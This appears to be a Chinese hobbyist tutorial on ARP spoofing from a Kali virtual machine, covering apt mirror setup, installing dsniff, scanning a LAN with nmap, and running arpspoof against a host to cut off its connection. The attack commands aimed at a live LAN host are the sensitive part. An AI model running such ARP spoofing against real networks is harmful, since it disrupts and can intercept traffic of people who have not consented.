一、环境准备:
- Kali虚拟机
- linux内核版本:5.16.0-kali5-amd64 (这只是说明下我的内核版本,其实只要版本不要太老,基本都能用)
- 在虚拟机设置的网络适配器里选择桥接模式
二、配置和安装相关第三方工具
1.配置源,kali默认的源在安装dsniff的时候会提示找不到包。
1. sudo vim /etc/apt/sources.list
2. 把之前kali默认的源也就是以deb开头的那两行注释掉 (在开头的第一个字母前端加#表示注释一行)
3. 将要添加的镜像加入刚刚打开的文件中,再输入:wq即可,常用镜像地址如下所示,选用一个就好,添加多个源容易发生冲突,我用的是阿里的源:#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#清华大学deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-freedeb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free#浙大deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-freedeb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free#东软大学#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib#deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib#官方源deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contrib4. 更新源对应的安装环境和安装包等配置apt-get clean && apt-get update && apt-get upgrade && apt-get dist-upgrade5.输入reboot重启虚拟机(非必须,但为保证配置生效,最好重启一遍)2.安装第三方工具包dsniff
sudo apt-get install dsniff3.测试dsniff是否安装成功
sudo arpspoof -hsudo dnsspoof -hsudo dsniff -h安装成功结果如下所示 :
三、开始ARP攻击
1.查看ip地址和网关地址(通常网关都是xxx.xxx.xxx.0,我这里的图是因为物理主机连的手机的wifi导致网关和正常局域网网关不太一样)
ifconfigroute -n
2.使用nmap探测局域网存活主机
#后面的ip是局域网网关地址
nmap -sP 192.168.243.0/24
3.攻击物理主机(友情提示,不要攻击正在打游戏的室友的主机,室友已经被游戏折磨的够惨了,就不要再搞得他惨上加惨了)
sudo arpspoof -i eth0 -t 192.168.243.193 192.168.243.0
-i:网卡名称
-t:目标主机IP 目标网关IP
4.检测目标主机能否正常联网
5.ctrl+z停止攻击,再次检测能否联网
四、疑惑
在实际测试的时候经常会有部分主机nmap无法扫描到,在物理主机上用Zenmap也不行,不知道是什么情况,以后有时间再慢慢研究吧。
